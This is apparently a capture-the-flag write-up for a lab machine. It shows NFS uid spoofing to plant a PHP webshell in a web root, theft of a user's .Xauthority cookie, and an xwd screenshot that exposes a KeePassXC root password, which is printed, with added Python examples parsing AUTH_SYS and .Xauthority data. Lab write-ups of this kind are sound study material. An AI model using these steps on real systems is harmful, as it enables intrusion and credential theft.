Basic information
Port scan: 22, 80, 111, 2049 are open:
```
$ nmap -sC -sV -Pn 10.10.11.191
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-23 10:02 CST
Nmap scan report for 10.10.11.191
Host is up (0.19s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      42739/tcp6  mountd
|   100005  1,2,3      45443/tcp   mountd
|   100005  1,2,3      58177/udp6  mountd
|   100005  1,2,3      60862/udp   mountd
|   100021  1,3,4      36049/udp   nlockmgr
|   100021  1,3,4      36287/tcp6  nlockmgr
|   100021  1,3,4      37279/tcp   nlockmgr
|   100021  1,3,4      44346/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp open  nfs_acl 3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.04 seconds
```
80
A furniture-related site (title "Built Better"):

2049 nfs
Two directories are exported over NFS, both to any client (`*`):
```
$ showmount -e 10.10.11.191
Exports list on 10.10.11.191:
/home/ross                          *
/var/www/html                       *

mkdir ross
mkdir html
# mount commands on macOS
sudo mount -o resvport,rw,nolocks -t nfs 10.10.11.191:/home/ross ross
sudo mount -o resvport,rw,nolocks -t nfs 10.10.11.191:/var/www/html html
```
webshell
html is the web root, so we can drop a webshell through NFS. The directory is owned by uid 2017, and NFS with AUTH_SYS trusts whatever uid the client presents, so we create a local user with that uid and write as it:
```
$ ls -ld html
drwxr-xr-- 5 2017 _appstore 4096 12 23 10:10 html
# owner uid 2017 has no local name; the group column shows _appstore because
# the client resolves the export's numeric gid against its own local accounts

sudo useradd dummy
sudo usermod -u 2017 dummy
sudo su dummy -c bash
echo xxx > shell.php   # xxx stands for the PHP webshell payload (elided in the original)
```
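Why matching the uid is enough: over NFSv3 the client itself serialises the uid/gid it claims into the RPC credential (AUTH_SYS, historically AUTH_UNIX), and the server only rewrites uid 0 when root_squash is on. The following is an added example, not code from the original writeup: it builds and parses that credential per the XDR layout in RFC 5531 and models, in simplified form, which uid an exports(5)-style server acts with. The machine name, the gid 33 and the squash model are assumptions for illustration, not observations from the box.

```python
import struct

AUTH_SYS = 1          # RPC auth flavor number for AUTH_SYS (a.k.a. AUTH_UNIX)
NOBODY_UID = 65534    # anonymous uid Linux knfsd uses for root_squash by default


def _xdr_opaque(b: bytes) -> bytes:
    """XDR variable-length opaque/string: u32 length, bytes, zero-pad to 4."""
    return struct.pack(">I", len(b)) + b + b"\x00" * ((-len(b)) % 4)


def build_auth_sys(uid: int, gid: int, gids=(), machine: bytes = b"attacker", stamp: int = 0) -> bytes:
    """Serialise an RPC credential (flavor, body length, body) for AUTH_SYS.

    The client fills in uid/gid itself; nothing here is checked by the server.
    """
    body = struct.pack(">I", stamp) + _xdr_opaque(machine)
    body += struct.pack(">II", uid, gid)
    body += struct.pack(">I", len(gids)) + b"".join(struct.pack(">I", g) for g in gids)
    return struct.pack(">II", AUTH_SYS, len(body)) + body


def parse_auth_sys(cred: bytes) -> dict:
    """Decode a credential as produced by build_auth_sys (or captured off the wire)."""
    flavor, length = struct.unpack_from(">II", cred, 0)
    if flavor != AUTH_SYS:
        raise ValueError(f"not AUTH_SYS: flavor {flavor}")
    body = cred[8:8 + length]
    off = 0
    (stamp,) = struct.unpack_from(">I", body, off)
    off += 4
    (n,) = struct.unpack_from(">I", body, off)
    off += 4
    machine = body[off:off + n]
    off += n + (-n) % 4                       # skip XDR padding
    uid, gid, ngids = struct.unpack_from(">III", body, off)
    off += 12
    gids = list(struct.unpack_from(">" + "I" * ngids, body, off))
    return {"stamp": stamp, "machine": machine, "uid": uid, "gid": gid, "gids": gids}


def server_view(cred: bytes, root_squash: bool = True, all_squash: bool = False) -> tuple:
    """Simplified model (assumption, not a real server) of the uid/gid the
    export acts with: root_squash remaps uid 0, all_squash remaps everyone."""
    c = parse_auth_sys(cred)
    if all_squash or (root_squash and c["uid"] == 0):
        return NOBODY_UID, NOBODY_UID
    return c["uid"], c["gid"]


def can_write(owner_uid: int, mode: int, cred: bytes, **squash) -> bool:
    """Owner-write check for a directory like html (drwxr-xr-- owned by 2017).
    Unsquashed root bypasses the mode bits; everyone else needs owner+w."""
    uid, _ = server_view(cred, **squash)
    if uid == 0:
        return True
    return uid == owner_uid and bool(mode & 0o200)


if __name__ == "__main__":
    html_owner, html_mode = 2017, 0o754          # from `ls -ld html`
    for label, cred in (("root", build_auth_sys(0, 0)), ("dummy", build_auth_sys(2017, 33))):
        print(label, "->", server_view(cred), "write:", can_write(html_owner, html_mode, cred))
```

With the default root_squash, a credential claiming uid 0 is mapped to 65534 and cannot write to html, while a credential claiming uid 2017 is taken at face value and can; this is exactly why the writeup creates `dummy` with uid 2017 instead of writing as root.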
user flag
The webshell runs as alex; upgrade it to a regular shell and read the user flag:

Privilege escalation
ross's home directory contains a .Xauthority file. We can copy it out over the NFS export, place it in alex's home (or /tmp, as below) and use it to talk to ross's X display: `w` shows who is logged in at the display, xdpyinfo confirms the cookie is accepted, and xwininfo lists the windows, which include KeePassXC:
```
w
XAUTHORITY=/tmp/.Xauthority xdpyinfo -display :0
XAUTHORITY=/tmp/.Xauthority xwininfo -root -tree -display :0
# (abbreviated xwininfo output: a KeePassXC window is present)
Keepassxc
```
A screenshot of the display captures the unlocked KeePassXC window, which shows the root password:
```
XAUTHORITY=/tmp/.Xauthority xwd -root -screen -silent -display :0 > /tmp/miao.xwd
# on the attacking machine, after copying /tmp/miao.xwd over
sudo apt install imagemagick
convert miao.xwd screenshot.png
# root password read from the screenshot:
cah$ mei7rai9A
```
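What the stolen .Xauthority actually carries, as an added example that is not part of the original writeup: the file is a sequence of records (see Xau(3) and xauth(1)), each a big-endian u16 family followed by four u16-length-prefixed fields: address, display number, auth-protocol name and auth data, normally a 16-byte MIT-MAGIC-COOKIE-1. Any process that can present that cookie to the X server gets the same access ross's session has, which is why xwd works. The sample file, host name and cookie bytes below are constructed for the example.

```python
import struct
from dataclasses import dataclass
from typing import List

FAMILY = {0: "Internet", 6: "Internet6", 256: "Local", 65535: "Wild"}


@dataclass
class XauthEntry:
    family: int
    address: bytes   # host name for Local, raw IP bytes for Internet
    number: str      # display number as ASCII digits, "0" for :0
    name: str        # auth protocol, normally "MIT-MAGIC-COOKIE-1"
    data: bytes      # the cookie (16 bytes for MIT-MAGIC-COOKIE-1)

    def display(self) -> str:
        """Render like `xauth list`: host/unix:N for local, host:N otherwise."""
        if self.family == 0 and len(self.address) == 4:
            host = ".".join(str(b) for b in self.address)
        else:
            host = self.address.decode("latin-1")
        return f"{host}/unix:{self.number}" if self.family == 256 else f"{host}:{self.number}"


def _field(buf: bytes, off: int):
    """Read one u16-length-prefixed field, returning (bytes, new_offset)."""
    (n,) = struct.unpack_from(">H", buf, off)
    off += 2
    if off + n > len(buf):
        raise ValueError("truncated .Xauthority record")
    return buf[off:off + n], off + n


def parse_xauthority(buf: bytes) -> List[XauthEntry]:
    entries, off = [], 0
    while off < len(buf):
        if off + 2 > len(buf):
            raise ValueError("truncated family field")
        (family,) = struct.unpack_from(">H", buf, off)
        off += 2
        address, off = _field(buf, off)
        number, off = _field(buf, off)
        name, off = _field(buf, off)
        data, off = _field(buf, off)
        entries.append(XauthEntry(family, address, number.decode(), name.decode(), data))
    return entries


def build_entry(family: int, address: bytes, number: str, name: str, data: bytes) -> bytes:
    """Inverse of parse_xauthority for a single record; used to build the sample."""
    def f(b: bytes) -> bytes:
        return struct.pack(">H", len(b)) + b
    return struct.pack(">H", family) + f(address) + f(number.encode()) + f(name.encode()) + f(data)


def cookies_for_display(entries: List[XauthEntry], number: str = "0") -> List[XauthEntry]:
    """Records usable for display :N (FamilyWild entries match any display)."""
    return [e for e in entries if e.number == number or e.family == 65535]


def summary(entries: List[XauthEntry]) -> List[str]:
    return [f"{FAMILY.get(e.family, e.family)} {e.display()} {e.name} {e.data.hex()}" for e in entries]


# Constructed sample: one local record for display :0, as a logged-in desktop user has.
SAMPLE_COOKIE = bytes.fromhex("00112233445566778899aabbccddeeff")
SAMPLE_XAUTHORITY = build_entry(256, b"victimhost", "0", "MIT-MAGIC-COOKIE-1", SAMPLE_COOKIE)

if __name__ == "__main__":
    for line in summary(parse_xauthority(SAMPLE_XAUTHORITY)):
        print(line)
```

Pointing `XAUTHORITY` at a copied file works precisely because the server checks nothing about who presents the cookie; on the defensive side, that is the argument for per-user file permissions on .Xauthority and for not exporting home directories over NFS.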
root flag
Log in as root over SSH with that password:
Last updated: 2022-12-23 10:53:39
Poor skills, beaten every day, can't do this and have to learn that; too dumb, always at the bottom, can't understand this and can't learn that.